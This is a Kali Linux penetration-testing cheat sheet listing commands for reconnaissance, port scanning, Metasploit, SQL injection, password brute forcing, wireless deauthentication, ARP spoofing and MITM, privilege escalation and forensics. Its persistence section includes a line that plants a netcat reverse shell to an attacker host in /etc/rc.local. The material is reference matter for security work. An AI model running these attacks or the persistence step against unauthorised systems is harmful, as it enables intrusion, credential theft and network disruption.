Kali Linux Command Cheat Sheet

The ultimate reference guide for penetration testing tools and commands

Introduction to Kali Linux

Kali Linux is a Debian-based Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security and comes pre-installed with numerous security tools.

Basic System Information

uname -a
Display system information including kernel version
cat /etc/os-release
Show Kali Linux version information
df -h
Check disk space usage
free -m
Display memory usage

Package Management

sudo apt update && sudo apt upgrade
Update package lists and upgrade packages
sudo apt install package_name
Install a new package
sudo apt remove package_name
Remove a package
sudo apt list --installed | grep keyword
Search for installed packages

System Commands

File System Navigation

ls -la
List all files with details
find / -name filename 2>/dev/null
Find files by name, hiding error messages
locate filename
Quickly locate files using database
updatedb
Update the locate database

User Management

sudo useradd -m username
Create a new user with home directory
sudo passwd username
Set or change password for a user
sudo usermod -aG sudo username
Add user to sudo group
id
Display current user ID and groups

Process Management

ps aux
Display all running processes
kill PID
Kill a process by its PID
killall process_name
Kill all processes with the given name
top
Display and manage running processes

Network Commands & Utilities

Network Configuration

ifconfig
Display network interfaces and IP addresses
ip a
Modern alternative to ifconfig
iwconfig
Display wireless network interfaces
route -n
Display routing table

Network Troubleshooting

ping target
Test connectivity to a host
traceroute target
Trace route to a host
mtr target
Combines ping and traceroute for network diagnostics
netstat -tuln
Show listening TCP and UDP ports with numeric addresses

Information Gathering

DNS Reconnaissance

host domain.com
Perform DNS lookup
dig domain.com any
Detailed DNS lookup with all records
dnsenum domain.com
Enumerate DNS information
dnsrecon -d domain.com
DNS reconnaissance tool

Subdomain Enumeration

sublist3r -d domain.com
Fast subdomain enumeration tool
amass enum -d domain.com
In-depth attack surface mapping tool
gobuster dns -d domain.com -w /usr/share/wordlists/dirb/common.txt
Brute force DNS subdomains
fierce --domain domain.com
DNS reconnaissance tool

WHOIS & IP Information

whois domain.com
Query WHOIS information for a domain
whois IP_address
Query WHOIS information for an IP address
theHarvester -d domain.com -b all
Gather emails, subdomains, hosts, etc.
recon-ng
Full-featured reconnaissance framework

Vulnerability Scanning

Port Scanning with Nmap

nmap -sS target
SYN (half-open) scan; the default when run as root
nmap -sV -sC target
Service version detection + default scripts
nmap -p- target
Scan all 65535 ports
nmap -A target
Aggressive scan (OS detection, version detection, script scanning, and traceroute)
nmap -sU target
UDP port scan
nmap --script vuln target
Scan for vulnerabilities
masscan -p1-65535 target --rate=1000
Fast port scanner
unicornscan target:1-65535
Flexible and efficient port scanner

Vulnerability Scanners

nikto -h target
Web server scanner
openvas-setup
Set up OpenVAS vulnerability scanner
searchsploit keyword
Search for exploits in Exploit-DB
wpscan --url http://example.com --enumerate u
WordPress vulnerability scanner

Exploitation Tools

Metasploit Framework

msfconsole
Start Metasploit console
search exploit_name
Search for exploits in Metasploit
use exploit_path
Select an exploit to use
show options
Display options for the selected exploit

Exploitation Examples

exploit
Run the selected exploit
sessions -l
List active sessions
sessions -i session_id
Interact with a specific session
background
Background the current session

Other Exploitation Tools

sqlmap -u http://example.com/page?id=1
Automated SQL injection tool
hydra -l username -P wordlist.txt service://target
Brute force login tool
john --wordlist=wordlist.txt hashfile
Password cracking tool
burpsuite
Web application security testing tool

Web Application Tools

Web Vulnerability Scanning

nikto -h http://example.com
Web server vulnerability scanner
wpscan --url http://example.com --enumerate u
WordPress vulnerability scanner
dirb http://example.com /usr/share/wordlists/dirb/common.txt
Web directory brute force tool
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt
Fast directory brute force tool

Web Exploitation

sqlmap -u http://example.com/page?id=1
Automated SQL injection tool
xsser -u http://example.com
Automated XSS testing tool
commix -u http://example.com/page.php?id=1
Automated command injection tool
burpsuite
Web application security testing tool

Password Attacks

Password Cracking

john --wordlist=wordlist.txt hashfile
Password cracking tool
hashcat -m hash_type -a attack_mode hashfile wordlist.txt
Advanced password recovery tool
hydra -l username -P wordlist.txt service://target
Brute force login tool
crunch min_length max_length charset -o wordlist.txt
Wordlist generator

Wireless Attacks

Wireless Reconnaissance

airodump-ng interface
Capture wireless packets
wash -i interface
Detect WPS-enabled networks
kismet
Wireless network detector
wifite
Automated wireless attack tool

Wireless Exploitation

aireplay-ng --deauth count -a BSSID -c client interface
Deauthentication attack
reaver -i interface -b BSSID
WPS PIN brute force attack
bully interface -b BSSID
WPS PIN brute force attack
fern-wifi-cracker
GUI-based wireless attack tool

Sniffing & Spoofing

Packet Sniffing

tcpdump -i interface
Capture network traffic
wireshark
GUI-based packet analyzer
tshark -i interface
Command-line packet analyzer
ettercap -T -i interface
Network sniffing and MITM tool

Spoofing & MITM

arpspoof -i interface -t target -r gateway
ARP spoofing tool
mitmproxy
Interactive TLS-capable intercepting proxy
bettercap -iface interface
Swiss army knife for network attacks
driftnet -i interface
Capture and display images from network traffic

Post Exploitation

Privilege Escalation

sudo -l
List available sudo privileges
find / -perm -u=s -o -perm -g=s 2>/dev/null
Find SUID/SGID files
linpeas.sh
Linux privilege escalation script
unix-privesc-check
Unix privilege escalation checker

Persistence

crontab -e
Edit cron jobs for persistence
echo "nc -e /bin/bash attacker_ip port" >> /etc/rc.local
Add reverse shell to rc.local
ssh-keygen -t rsa
Generate SSH keys for persistence
chkconfig --add service
Add a service for persistence

Digital Forensics

File Analysis

strings file
Extract strings from a binary file
binwalk file
Analyze and extract firmware images
foremost -i file
File carving tool
volatility -f memory_dump imageinfo
Analyze memory dumps

Disk Analysis

fdisk -l
List disk partitions
dd if=/dev/sda of=image.img
Create a disk image
testdisk
Partition recovery tool
photorec
File recovery tool

Reporting Tools

Report Generation

dradis
Collaborative reporting tool
faraday
Collaborative pentest platform
magictree
Penetration test data organizer
serpico
Report generation tool

Social Engineering

Social Engineering Toolkit (SET)

setoolkit
Launch the Social Engineering Toolkit
setoolkit --update
Update the Social Engineering Toolkit
setoolkit --config
Configure the Social Engineering Toolkit
setoolkit --help
Show SET help menu

Anonymity Tools

Tor & Proxychains

service tor start
Start Tor service
proxychains command
Run a command through proxychains
torsocks command
Run a command through Tor
macchanger -r interface
Randomize MAC address

Bash Scripting for Pentesters

Basic Scripting

#!/bin/bash
Shebang for bash scripts
echo "Hello, World!"
Print text to the terminal
read -p "Enter input: " variable
Read user input into a variable
if [ condition ]; then command; fi
Basic if statement

Advanced Scripting

for i in {1..10}; do command; done
For loop example
while [ condition ]; do command; done
While loop example
case variable in pattern1) command1;; pattern2) command2;; esac
Case statement example
function name() { commands; }
Function definition